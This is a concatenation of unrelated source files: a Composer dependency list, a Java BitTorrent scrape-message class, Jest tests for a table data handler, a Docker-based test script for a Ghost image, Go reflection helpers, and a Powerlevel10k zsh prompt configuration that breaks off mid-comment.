COMPOSER_REQUIRE="$COMPOSER_REQUIRE doctrine/orm:~2.6.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE doctrine/doctrine-bundle"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/config:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/console:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/dependency-injection:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/doctrine-bridge:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/framework-bundle:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/http-kernel:~3.3"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE symfony/yaml:~3.3"
DBAL='doctrine'
|
<gh_stars>0
package com.acgist.snail.pojo.message;
import com.acgist.snail.net.torrent.tracker.TrackerLauncher;
import com.acgist.snail.utils.BeanUtils;
/**
* <p>Tracker刮檫响应消息</p>
* <p>UDP:http://www.bittorrent.org/beps/bep_0048.html</p>
* <p>HTTP:https://wiki.theory.org/index.php/BitTorrentSpecification</p>
*
* @author acgist
*/
public final class ScrapeMessage {
/**
* <p>ID</p>
*
* @see TrackerLauncher#id()
*/
private Integer id;
/**
* <p>做种Peer数量</p>
*/
private Integer seeder;
/**
* <p>下载Peer数量</p>
*/
private Integer leecher;
/**
* <p>完成Peer数量</p>
*/
private Integer completed;
/**
* <p>获取ID</p>
*
* @return ID
*/
public Integer getId() {
return this.id;
}
/**
* <p>设置ID</p>
*
* @param id ID
*/
public void setId(Integer id) {
this.id = id;
}
/**
* <p>获取做种Peer数量</p>
*
* @return 做种Peer数量
*/
public Integer getSeeder() {
return this.seeder;
}
/**
* <p>设置做种Peer数量</p>
*
* @param seeder 做种Peer数量
*/
public void setSeeder(Integer seeder) {
this.seeder = seeder;
}
/**
* <p>获取下载Peer数量</p>
*
* @return 下载Peer数量
*/
public Integer getLeecher() {
return this.leecher;
}
/**
* <p>设置下载Peer数量</p>
*
* @param leecher 下载Peer数量
*/
public void setLeecher(Integer leecher) {
this.leecher = leecher;
}
/**
* <p>获取完成Peer数量</p>
*
* @return 完成Peer数量
*/
public Integer getCompleted() {
return this.completed;
}
/**
* <p>设置完成Peer数量</p>
*
* @param completed 完成Peer数量
*/
public void setCompleted(Integer completed) {
this.completed = completed;
}
@Override
public String toString() {
return BeanUtils.toString(this);
}
}
|
<gh_stars>10-100
jest.mock( '../column' );
import { Column } from '../column';
import { DefaultHandler } from './default-handler';
const rows = [
{ id: 1, user: { firstName: 'John', lastName: 'Doe' }, order: 2, eq: 42 },
{ id: 2, user: { firstName: 'Jane', lastName: 'Doe' }, order: 1, eq: 42 },
{ id: 3, user: { firstName: 'Foo', lastName: 'Bar' }, order: 3, eq: 42 },
];
type RowType = typeof rows[0];
const columns = [
new Column( { label: '', field: 'id' } ),
new Column( { label: '', field: 'user.lastName' } ),
new Column( { label: '', representedAs: ( row: any ) => row.user.firstName + row.user.lastName } ),
new Column( { label: '', field: 'order' } ),
new Column( { label: '', field: 'eq' } ),
];
it( 'has the correct methods', () => {
const handler = new DefaultHandler();
expect( typeof handler.filterHandler ).toBe( 'function' );
expect( typeof handler.sortHandler ).toBe( 'function' );
expect( typeof handler.paginateHandler ).toBe( 'function' );
expect( typeof handler.displayHandler ).toBe( 'function' );
} );
describe( 'can filter data', () => {
it( 'Filter data with nil value or empty array should directly return input', async () => {
const handler = new DefaultHandler<RowType>();
const rowMatchSpied = jest.spyOn( handler, 'rowMatches' );
let filtered = await handler.filterHandler( rows, undefined, columns );
expect( rowMatchSpied ).not.toHaveBeenCalled();
expect( filtered ).toHaveLength( 3 );
expect( filtered[0].id ).toBe( 1 );
expect( filtered[1].id ).toBe( 2 );
expect( filtered[2].id ).toBe( 3 );
rowMatchSpied.mockClear();
filtered = await handler.filterHandler( rows, [], columns );
expect( rowMatchSpied ).not.toHaveBeenCalled();
expect( filtered ).toHaveLength( 3 );
expect( filtered[0].id ).toBe( 1 );
expect( filtered[1].id ).toBe( 2 );
expect( filtered[2].id ).toBe( 3 );
} );
it( 'can filter data by a single string', async () => {
const handler = new DefaultHandler<RowType>();
const rowMatchSpied = jest.spyOn( handler, 'rowMatches' );
let filtered = await handler.filterHandler( rows, 'jo do', columns );
expect( rowMatchSpied ).toHaveBeenCalledTimes( 5 );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'jo', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'jo', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'jo', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'do', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'do', columns );
expect( filtered ).toHaveLength( 2 );
expect( filtered[0].id ).toBe( 1 );
expect( filtered[1].id ).toBe( 2 );
rowMatchSpied.mockClear();
filtered = await handler.filterHandler( rows, 'nedo', columns );
expect( rowMatchSpied ).toHaveBeenCalledTimes( 3 );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'nedo', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'nedo', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'nedo', columns );
expect( filtered ).toHaveLength( 1 );
expect( filtered[0].id ).toBe( 2 );
rowMatchSpied.mockClear();
filtered = await handler.filterHandler( rows, 'bogus', columns );
expect( rowMatchSpied ).toHaveBeenCalledTimes( 3 );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'bogus', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'bogus', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'bogus', columns );
expect( filtered ).toHaveLength( 0 );
rowMatchSpied.mockClear();
filtered = await handler.filterHandler( rows, 'j doe', columns );
expect( rowMatchSpied ).toHaveBeenCalledTimes( 4 );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'j', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'j', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'j', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'doe', columns );
expect( filtered ).toHaveLength( 2 );
expect( filtered[0].id ).toBe( 1 );
expect( filtered[1].id ).toBe( 2 );
} );
it( 'can filter data by multiple strings', async () => {
const handler = new DefaultHandler<RowType>();
const rowMatchSpied = jest.spyOn( handler, 'rowMatches' );
let filtered = await handler.filterHandler( rows, ['jo', 'do'], columns );
expect( rowMatchSpied ).toHaveBeenCalledTimes( 5 );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'jo', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'jo', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'do', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'jo', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'do', columns );
expect( filtered ).toHaveLength( 2 );
expect( filtered[0].id ).toBe( 1 );
expect( filtered[1].id ).toBe( 2 );
rowMatchSpied.mockClear();
filtered = await handler.filterHandler( rows, ['bogus'], columns );
expect( rowMatchSpied ).toHaveBeenCalledTimes( 3 );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'bogus', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'bogus', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'bogus', columns );
expect( filtered ).toHaveLength( 0 );
rowMatchSpied.mockClear();
filtered = await handler.filterHandler( rows, ['j doe', 'do'], columns );
expect( rowMatchSpied ).toHaveBeenCalledTimes( 6 );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'j doe', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'j doe', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'j doe', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'do', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'do', columns );
expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'do', columns );
expect( filtered ).toHaveLength( 2 );
expect( filtered[0].id ).toBe( 1 );
expect( filtered[1].id ).toBe( 2 );
} );
it( 'Should not filter columns explicitly marked as non-filterable', async () => {
const handler = new DefaultHandler<RowType>();
const rowMatchSpied = jest.spyOn( handler, 'rowMatches' );
const filtered = await handler.filterHandler(
[{ foo: 'qux', baz: 'bar' }, { foo: 'qux', baz: 'bat' }],
'bar',
[new Column( { field: 'foo', filterable: false } ), new Column( { field: 'baz', filterable: true } )],
);
expect( filtered ).toHaveLength( 1 );
} );
} );
describe( 'can sort data', () => {
it( 'Sort with no column or order should be stable', async () => {
const handler = new DefaultHandler<RowType>();
const sorted = await handler.sortHandler( rows, undefined, null );
expect( sorted ).toHaveLength( 3 );
expect( sorted[0].id ).toBe( 1 );
expect( sorted[1].id ).toBe( 2 );
expect( sorted[2].id ).toBe( 3 );
} );
it( 'Sort ascending should sort correctly', async () => {
const handler = new DefaultHandler<RowType>();
const sorted = await handler.sortHandler( rows, columns[3], 'asc' );
expect( sorted ).toHaveLength( 3 );
expect( sorted[0].id ).toBe( 2 );
expect( sorted[1].id ).toBe( 1 );
expect( sorted[2].id ).toBe( 3 );
} );
it( 'Sort descending should sort correctly', async () => {
const handler = new DefaultHandler<RowType>();
const sorted = await handler.sortHandler( rows, columns[3], 'desc' );
expect( sorted ).toHaveLength( 3 );
expect( sorted[0].id ).toBe( 3 );
expect( sorted[1].id ).toBe( 1 );
expect( sorted[2].id ).toBe( 2 );
} );
it( 'Sort on string should sort alphabetically', async () => {
const handler = new DefaultHandler<RowType>();
const sorted = await handler.sortHandler( rows, columns[2], 'asc' );
expect( sorted ).toHaveLength( 3 );
expect( sorted[0].id ).toBe( 3 );
expect( sorted[1].id ).toBe( 2 );
expect( sorted[2].id ).toBe( 1 );
} );
it( 'Sort equal cols value should be stable', async () => {
const handler = new DefaultHandler<RowType>();
const sorted = await handler.sortHandler( rows, columns[4], 'desc' );
expect( sorted ).toHaveLength( 3 );
expect( sorted[0].id ).toBe( 1 );
expect( sorted[1].id ).toBe( 2 );
expect( sorted[2].id ).toBe( 3 );
} );
} );
describe( 'can paginate data', () => {
it( 'Normal pagination should return a correct number of items', async () => {
const handler = new DefaultHandler<RowType>();
let paged = await handler.paginateHandler( rows, 1, 1 );
expect( paged ).toHaveLength( 1 );
expect( paged[0].id ).toBe( 1 );
paged = await handler.paginateHandler( rows, 1, 2 );
expect( paged ).toHaveLength( 1 );
expect( paged[0].id ).toBe( 2 );
paged = await handler.paginateHandler( rows, 2, 1 );
expect( paged ).toHaveLength( 2 );
expect( paged[0].id ).toBe( 1 );
expect( paged[1].id ).toBe( 2 );
} );
it( 'Paginate with 0 or less items per page should skip pagination', async () => {
const handler = new DefaultHandler<RowType>();
expect( await handler.paginateHandler( rows, 0, 1 ) ).toBe( rows );
expect( await handler.paginateHandler( rows, -5, 1 ) ).toBe( rows );
} );
it( 'Paginate for page 0 or less should skip pagination', async () => {
const handler = new DefaultHandler<RowType>();
expect( await handler.paginateHandler( rows, 1, 0 ) ).toBe( rows );
expect( await handler.paginateHandler( rows, 1, -5 ) ).toBe( rows );
} );
} );
it( 'Display handler extracts correct data', async () => {
const handler = new DefaultHandler<{id: number}>();
expect( await handler.displayHandler( {
filtered: [{ id: 1 }, { id: 2 }],
paged: [{ id: 1 }],
sorted: [{ id: 1 }, { id: 2 }],
source: [{ id: 1 }, { id: 2 }, { id: 3 }],
} ) ).toEqual( { rows: [{ id: 1 }], totalRowCount: 2 } );
} );
|
#!/bin/bash
set -eo pipefail
dir="$(dirname "$(readlink -f "$BASH_SOURCE")")"
serverImage="$1"
# Use a client image with curl for testing
clientImage='buildpack-deps:jessie-curl'
# Create an instance of the container-under-test
cid="$(docker run -d "$serverImage")"
trap "docker rm -vf $cid > /dev/null" EXIT
_request() {
local method="$1"
shift
local url="${1}"
shift
docker run --rm --link "$cid":ghost "$clientImage" \
curl -fs -X"$method" "$@" "http://ghost:2368/$url"
}
# Make sure that Ghost is listening and ready
. "$dir/../../retry.sh" '_request GET / --output /dev/null'
# Check that /ghost/ redirects to setup (the image is unconfigured by default)
ghostVersion="$(docker inspect --format '{{range .Config.Env}}{{ . }}{{"\n"}}{{end}}' "$serverImage" | awk -F= '$1 == "GHOST_VERSION" { print $2 }')"
case "$ghostVersion" in
0.*) _request GET '/ghost/' -I | grep -q '^Location: .*setup' ;;
*) _request GET '/ghost/api/v0.1/authentication/setup/' | grep -q 'status":false' ;;
esac
|
<reponame>shammishailaj/ghd<gh_stars>0
package utils
import (
"log"
"reflect"
)
func GetFieldTagMap(d interface{}, tagIdentifier string) map[string]string {
log.Printf("============================================================GetFieldTagMap()")
log.Printf("d = %#v", d)
var fieldTagMap map[string]string
if d == nil {
return fieldTagMap
}
v := reflect.TypeOf(d)
reflectValue := reflect.ValueOf(d)
reflectValue = reflect.Indirect(reflectValue)
if v.Kind() == reflect.Ptr {
v = v.Elem()
}
fieldTagMap = make(map[string]string)
log.Printf("Type of d = %s. Kind: %s", v.Name(), v.Kind())
if v != nil {
for i := 0; i < v.NumField(); i++ {
field := v.Field(i)
//fieldTagMap[field.Name] = v.FieldByIndex(i).Tag
fieldTagMap[field.Name] = field.Tag.Get(tagIdentifier)
log.Printf("Found field Tag = %s for field named: %s", fieldTagMap[field.Name], field.Name)
}
}
return fieldTagMap
}
func GetTagValueMap(d interface{}, tagIdentifier string) map[string]string {
log.Printf("============================================================GetFieldTagMap()")
log.Printf("d = %#v", d)
var tagValueMap map[string]string
if d == nil {
return tagValueMap
}
v := reflect.TypeOf(d)
val := reflect.ValueOf(d)
reflectValue := reflect.ValueOf(d)
reflectValue = reflect.Indirect(reflectValue)
if v.Kind() == reflect.Ptr {
v = v.Elem()
}
tagValueMap = make(map[string]string)
log.Printf("Type of d = %s. Kind: %s", v.Name(), v.Kind())
if v != nil {
for i := 0; i < v.NumField(); i++ {
field := v.Field(i)
//fieldTagMap[field.Name] = v.FieldByIndex(i).Tag
//tagValueMap[field.Name] = field.Tag.Get(tagIdentifier)
tagName := field.Tag.Get(tagIdentifier)
tagValueMap[tagName] = reflect.Indirect(val).FieldByName(field.Name).String()
log.Printf("Found field Tag = %s, Value: %s", tagName, tagValueMap[tagName])
}
}
return tagValueMap
}
func GetFieldValue(d interface{}, field string) interface{} {
var fieldValue interface{}
if d == nil {
return fieldValue
}
v := reflect.TypeOf(d)
reflectValue := reflect.ValueOf(d)
reflectValue = reflect.Indirect(reflectValue)
if v.Kind() == reflect.Ptr {
v = v.Elem()
}
log.Printf("Type of d = %s. Kind: %s", v.Name(), v.Kind())
r := reflect.ValueOf(d)
fieldValue = reflect.Indirect(r).FieldByName(field)
return fieldValue
} |
# Generated by Powerlevel10k configuration wizard on 2020-12-06 at 19:56 +07.
# Based on romkatv/powerlevel10k/config/p10k-rainbow.zsh, checksum 24826.
# Wizard options: nerdfont-complete + powerline, small icons, rainbow, unicode,
# vertical separators, round heads, flat tails, 2 lines, dotted, no frame,
# darkest-ornaments, sparse, few icons, concise, transient_prompt,
# instant_prompt=verbose.
# Type `p10k configure` to generate another config.
#
# Config for Powerlevel10k with powerline prompt style with colorful background.
# Type `p10k configure` to generate your own config based on it.
#
# Tip: Looking for a nice color? Here's a one-liner to print colormap.
#
# for i in {0..255}; do print -Pn "%K{$i} %k%F{$i}${(l:3::0:)i}%f " ${${(M)$((i%6)):#3}:+$'\n'}; done
# Temporarily change options.
'builtin' 'local' '-a' 'p10k_config_opts'
[[ ! -o 'aliases' ]] || p10k_config_opts+=('aliases')
[[ ! -o 'sh_glob' ]] || p10k_config_opts+=('sh_glob')
[[ ! -o 'no_brace_expand' ]] || p10k_config_opts+=('no_brace_expand')
'builtin' 'setopt' 'no_aliases' 'no_sh_glob' 'brace_expand'
() {
emulate -L zsh -o extended_glob
# Unset all configuration options. This allows you to apply configuration changes without
# restarting zsh. Edit ~/.p10k.zsh and type `source ~/.p10k.zsh`.
unset -m '(POWERLEVEL9K_*|DEFAULT_USER)~POWERLEVEL9K_GITSTATUS_DIR'
# Zsh >= 5.1 is required.
autoload -Uz is-at-least && is-at-least 5.1 || return
# The list of segments shown on the left. Fill it with the most important segments.
typeset -g POWERLEVEL9K_LEFT_PROMPT_ELEMENTS=(
# =========================[ Line #1 ]=========================
# os_icon # os identifier
dir # current directory
vcs # git status
# =========================[ Line #2 ]=========================
newline # \n
prompt_char # prompt symbol
)
# The list of segments shown on the right. Fill it with less important segments.
# Right prompt on the last prompt line (where you are typing your commands) gets
# automatically hidden when the input line reaches it. Right prompt above the
# last prompt line gets hidden if it would overlap with left prompt.
typeset -g POWERLEVEL9K_RIGHT_PROMPT_ELEMENTS=(
# =========================[ Line #1 ]=========================
status # exit code of the last command
command_execution_time # duration of the last command
background_jobs # presence of background jobs
direnv # direnv status (https://direnv.net/)
asdf # asdf version manager (https://github.com/asdf-vm/asdf)
virtualenv # python virtual environment (https://docs.python.org/3/library/venv.html)
anaconda # conda environment (https://conda.io/)
pyenv # python environment (https://github.com/pyenv/pyenv)
goenv # go environment (https://github.com/syndbg/goenv)
nodenv # node.js version from nodenv (https://github.com/nodenv/nodenv)
nvm # node.js version from nvm (https://github.com/nvm-sh/nvm)
nodeenv # node.js environment (https://github.com/ekalinin/nodeenv)
# node_version # node.js version
# go_version # go version (https://golang.org)
# rust_version # rustc version (https://www.rust-lang.org)
# dotnet_version # .NET version (https://dotnet.microsoft.com)
# php_version # php version (https://www.php.net/)
# laravel_version # laravel php framework version (https://laravel.com/)
# java_version # java version (https://www.java.com/)
# package # name@version from package.json (https://docs.npmjs.com/files/package.json)
rbenv # ruby version from rbenv (https://github.com/rbenv/rbenv)
rvm # ruby version from rvm (https://rvm.io)
fvm # flutter version management (https://github.com/leoafarias/fvm)
luaenv # lua version from luaenv (https://github.com/cehoffman/luaenv)
jenv # java version from jenv (https://github.com/jenv/jenv)
plenv # perl version from plenv (https://github.com/tokuhirom/plenv)
phpenv # php version from phpenv (https://github.com/phpenv/phpenv)
scalaenv # scala version from scalaenv (https://github.com/scalaenv/scalaenv)
haskell_stack # haskell version from stack (https://haskellstack.org/)
kubecontext # current kubernetes context (https://kubernetes.io/)
terraform # terraform workspace (https://www.terraform.io)
aws # aws profile (https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-profiles.html)
aws_eb_env # aws elastic beanstalk environment (https://aws.amazon.com/elasticbeanstalk/)
azure # azure account name (https://docs.microsoft.com/en-us/cli/azure)
gcloud # google cloud cli account and project (https://cloud.google.com/)
google_app_cred # google application credentials (https://cloud.google.com/docs/authentication/production)
context # user@hostname
nordvpn # nordvpn connection status, linux only (https://nordvpn.com/)
ranger # ranger shell (https://github.com/ranger/ranger)
nnn # nnn shell (https://github.com/jarun/nnn)
vim_shell # vim shell indicator (:sh)
midnight_commander # midnight commander shell (https://midnight-commander.org/)
nix_shell # nix shell (https://nixos.org/nixos/nix-pills/developing-with-nix-shell.html)
# vi_mode # vi mode (you don't need this if you've enabled prompt_char)
# vpn_ip # virtual private network indicator
# load # CPU load
# disk_usage # disk usage
# ram # free RAM
# swap # used swap
todo # todo items (https://github.com/todotxt/todo.txt-cli)
timewarrior # timewarrior tracking status (https://timewarrior.net/)
taskwarrior # taskwarrior task count (https://taskwarrior.org/)
# time # current time
# =========================[ Line #2 ]=========================
newline
# ip # ip address and bandwidth usage for a specified network interface
# public_ip # public IP address
# proxy # system-wide http/https/ftp proxy
# battery # internal battery
# wifi # wifi speed
# example # example user-defined segment (see prompt_example function below)
)
# Defines character set used by powerlevel10k. It's best to let `p10k configure` set it for you.
typeset -g POWERLEVEL9K_MODE=nerdfont-complete
# When set to `moderate`, some icons will have an extra space after them. This is meant to avoid
# icon overlap when using non-monospace fonts. When set to `none`, spaces are not added.
typeset -g POWERLEVEL9K_ICON_PADDING=none
# When set to true, icons appear before content on both sides of the prompt. When set
# to false, icons go after content. If empty or not set, icons go before content in the left
# prompt and after content in the right prompt.
#
# You can also override it for a specific segment:
#
# POWERLEVEL9K_STATUS_ICON_BEFORE_CONTENT=false
#
# Or for a specific segment in specific state:
#
# POWERLEVEL9K_DIR_NOT_WRITABLE_ICON_BEFORE_CONTENT=false
typeset -g POWERLEVEL9K_ICON_BEFORE_CONTENT=
# Add an empty line before each prompt.
typeset -g POWERLEVEL9K_PROMPT_ADD_NEWLINE=true
# Connect left prompt lines with these symbols. You'll probably want to use the same color
# as POWERLEVEL9K_MULTILINE_FIRST_PROMPT_GAP_FOREGROUND below.
typeset -g POWERLEVEL9K_MULTILINE_FIRST_PROMPT_PREFIX=
typeset -g POWERLEVEL9K_MULTILINE_NEWLINE_PROMPT_PREFIX=
typeset -g POWERLEVEL9K_MULTILINE_LAST_PROMPT_PREFIX=
# Connect right prompt lines with these symbols.
typeset -g POWERLEVEL9K_MULTILINE_FIRST_PROMPT_SUFFIX=
typeset -g POWERLEVEL9K_MULTILINE_NEWLINE_PROMPT_SUFFIX=
typeset -g POWERLEVEL9K_MULTILINE_LAST_PROMPT_SUFFIX=
# Filler between left and right prompt on the first prompt line. You can set it to ' ', '·' or
# '─'. The last two make it easier to see the alignment between left and right prompt and to
# separate prompt from command output. You might want to set POWERLEVEL9K_PROMPT_ADD_NEWLINE=false
# for more compact prompt if using using this option.
typeset -g POWERLEVEL9K_MULTILINE_FIRST_PROMPT_GAP_CHAR='·'
typeset -g POWERLEVEL9K_MULTILINE_FIRST_PROMPT_GAP_BACKGROUND=
typeset -g POWERLEVEL9K_MULTILINE_NEWLINE_PROMPT_GAP_BACKGROUND=
if [[ $POWERLEVEL9K_MULTILINE_FIRST_PROMPT_GAP_CHAR != ' ' ]]; then
# The color of the filler. You'll probably want to match the color of POWERLEVEL9K_MULTILINE
# ornaments defined above.
typeset -g POWERLEVEL9K_MULTILINE_FIRST_PROMPT_GAP_FOREGROUND=238
# Start filler from the edge of the screen if there are no left segments on the first line.
typeset -g POWERLEVEL9K_EMPTY_LINE_LEFT_PROMPT_FIRST_SEGMENT_END_SYMBOL='%{%}'
# End filler on the edge of the screen if there are no right segments on the first line.
typeset -g POWERLEVEL9K_EMPTY_LINE_RIGHT_PROMPT_FIRST_SEGMENT_START_SYMBOL='%{%}'
fi
# Separator between same-color segments on the left.
typeset -g POWERLEVEL9K_LEFT_SUBSEGMENT_SEPARATOR='\u2502'
# Separator between same-color segments on the right.
typeset -g POWERLEVEL9K_RIGHT_SUBSEGMENT_SEPARATOR='\u2502'
# Separator between different-color segments on the left.
typeset -g POWERLEVEL9K_LEFT_SEGMENT_SEPARATOR=''
# Separator between different-color segments on the right.
typeset -g POWERLEVEL9K_RIGHT_SEGMENT_SEPARATOR=''
# The right end of left prompt.
typeset -g POWERLEVEL9K_LEFT_PROMPT_LAST_SEGMENT_END_SYMBOL='\uE0B4'
# The left end of right prompt.
typeset -g POWERLEVEL9K_RIGHT_PROMPT_FIRST_SEGMENT_START_SYMBOL='\uE0B6'
# The left end of left prompt.
typeset -g POWERLEVEL9K_LEFT_PROMPT_FIRST_SEGMENT_START_SYMBOL=''
# The right end of right prompt.
typeset -g POWERLEVEL9K_RIGHT_PROMPT_LAST_SEGMENT_END_SYMBOL=''
# Left prompt terminator for lines without any segments.
typeset -g POWERLEVEL9K_EMPTY_LINE_LEFT_PROMPT_LAST_SEGMENT_END_SYMBOL=
#################################[ os_icon: os identifier ]##################################
# OS identifier color.
typeset -g POWERLEVEL9K_OS_ICON_FOREGROUND=232
typeset -g POWERLEVEL9K_OS_ICON_BACKGROUND=7
# Custom icon.
# typeset -g POWERLEVEL9K_OS_ICON_CONTENT_EXPANSION='⭐'
################################[ prompt_char: prompt symbol ]################################
# Transparent background.
typeset -g POWERLEVEL9K_PROMPT_CHAR_BACKGROUND=
# Green prompt symbol if the last command succeeded.
typeset -g POWERLEVEL9K_PROMPT_CHAR_OK_{VIINS,VICMD,VIVIS,VIOWR}_FOREGROUND=76
# Red prompt symbol if the last command failed.
typeset -g POWERLEVEL9K_PROMPT_CHAR_ERROR_{VIINS,VICMD,VIVIS,VIOWR}_FOREGROUND=196
# Default prompt symbol.
typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VIINS_CONTENT_EXPANSION='❯'
# Prompt symbol in command vi mode.
typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VICMD_CONTENT_EXPANSION='❮'
# Prompt symbol in visual vi mode.
typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VIVIS_CONTENT_EXPANSION='V'
# Prompt symbol in overwrite vi mode.
typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VIOWR_CONTENT_EXPANSION='▶'
typeset -g POWERLEVEL9K_PROMPT_CHAR_OVERWRITE_STATE=true
# No line terminator if prompt_char is the last segment.
typeset -g POWERLEVEL9K_PROMPT_CHAR_LEFT_PROMPT_LAST_SEGMENT_END_SYMBOL=
# No line introducer if prompt_char is the first segment.
typeset -g POWERLEVEL9K_PROMPT_CHAR_LEFT_PROMPT_FIRST_SEGMENT_START_SYMBOL=
# No surrounding whitespace.
typeset -g POWERLEVEL9K_PROMPT_CHAR_LEFT_{LEFT,RIGHT}_WHITESPACE=
##################################[ dir: current directory ]##################################
# Current directory background color.
typeset -g POWERLEVEL9K_DIR_BACKGROUND=4
# Default current directory foreground color.
typeset -g POWERLEVEL9K_DIR_FOREGROUND=254
# If directory is too long, shorten some of its segments to the shortest possible unique
# prefix. The shortened directory can be tab-completed to the original.
typeset -g POWERLEVEL9K_SHORTEN_STRATEGY=truncate_to_unique
# Replace removed segment suffixes with this symbol.
typeset -g POWERLEVEL9K_SHORTEN_DELIMITER=
# Color of the shortened directory segments.
typeset -g POWERLEVEL9K_DIR_SHORTENED_FOREGROUND=250
# Color of the anchor directory segments. Anchor segments are never shortened. The first
# segment is always an anchor.
typeset -g POWERLEVEL9K_DIR_ANCHOR_FOREGROUND=255
# Display anchor directory segments in bold.
typeset -g POWERLEVEL9K_DIR_ANCHOR_BOLD=true
# Don't shorten directories that contain any of these files. They are anchors.
local anchor_files=(
.bzr
.citc
.git
.hg
.node-version
.python-version
.go-version
.ruby-version
.lua-version
.java-version
.perl-version
.php-version
.tool-version
.shorten_folder_marker
.svn
.terraform
CVS
Cargo.toml
composer.json
go.mod
package.json
stack.yaml
)
typeset -g POWERLEVEL9K_SHORTEN_FOLDER_MARKER="(${(j:|:)anchor_files})"
# If set to "first" ("last"), remove everything before the first (last) subdirectory that contains
# files matching $POWERLEVEL9K_SHORTEN_FOLDER_MARKER. For example, when the current directory is
# /foo/bar/git_repo/nested_git_repo/baz, prompt will display git_repo/nested_git_repo/baz (first)
# or nested_git_repo/baz (last). This assumes that git_repo and nested_git_repo contain markers
# and other directories don't.
#
# Optionally, "first" and "last" can be followed by ":<offset>" where <offset> is an integer.
# This moves the truncation point to the right (positive offset) or to the left (negative offset)
# relative to the marker. Plain "first" and "last" are equivalent to "first:0" and "last:0"
# respectively.
typeset -g POWERLEVEL9K_DIR_TRUNCATE_BEFORE_MARKER=false
# Don't shorten this many last directory segments. They are anchors.
typeset -g POWERLEVEL9K_SHORTEN_DIR_LENGTH=1
# Shorten directory if it's longer than this even if there is space for it. The value can
# be either absolute (e.g., '80') or a percentage of terminal width (e.g, '50%'). If empty,
# directory will be shortened only when prompt doesn't fit or when other parameters demand it
# (see POWERLEVEL9K_DIR_MIN_COMMAND_COLUMNS and POWERLEVEL9K_DIR_MIN_COMMAND_COLUMNS_PCT below).
# If set to `0`, directory will always be shortened to its minimum length.
typeset -g POWERLEVEL9K_DIR_MAX_LENGTH=80
# When `dir` segment is on the last prompt line, try to shorten it enough to leave at least this
# many columns for typing commands.
typeset -g POWERLEVEL9K_DIR_MIN_COMMAND_COLUMNS=40
# When `dir` segment is on the last prompt line, try to shorten it enough to leave at least
# COLUMNS * POWERLEVEL9K_DIR_MIN_COMMAND_COLUMNS_PCT * 0.01 columns for typing commands.
typeset -g POWERLEVEL9K_DIR_MIN_COMMAND_COLUMNS_PCT=50
# If set to true, embed a hyperlink into the directory. Useful for quickly
# opening a directory in the file manager simply by clicking the link.
# Can also be handy when the directory is shortened, as it allows you to see
# the full directory that was used in previous commands.
typeset -g POWERLEVEL9K_DIR_HYPERLINK=false
# Enable special styling for non-writable directories. See POWERLEVEL9K_LOCK_ICON and
# POWERLEVEL9K_DIR_CLASSES below.
typeset -g POWERLEVEL9K_DIR_SHOW_WRITABLE=v2
# The default icon shown next to non-writable directories when POWERLEVEL9K_DIR_SHOW_WRITABLE is
# set to v2.
# typeset -g POWERLEVEL9K_LOCK_ICON='⭐'
# POWERLEVEL9K_DIR_CLASSES allows you to specify custom icons and colors for different
# directories. It must be an array with 3 * N elements. Each triplet consists of:
#
# 1. A pattern against which the current directory ($PWD) is matched. Matching is done with
# extended_glob option enabled.
# 2. Directory class for the purpose of styling.
# 3. An empty string.
#
# Triplets are tried in order. The first triplet whose pattern matches $PWD wins.
#
# If POWERLEVEL9K_DIR_SHOW_WRITABLE is set to v2 and the current directory is not writable,
# its class gets suffix _NOT_WRITABLE.
#
# For example, given these settings:
#
# typeset -g POWERLEVEL9K_DIR_CLASSES=(
# '~/work(|/*)' WORK ''
# '~(|/*)' HOME ''
# '*' DEFAULT '')
#
# Whenever the current directory is ~/work or a subdirectory of ~/work, it gets styled with class
# WORK or WORK_NOT_WRITABLE.
#
# Simply assigning classes to directories doesn't have any visible effects. It merely gives you an
# option to define custom colors and icons for different directory classes.
#
# # Styling for WORK.
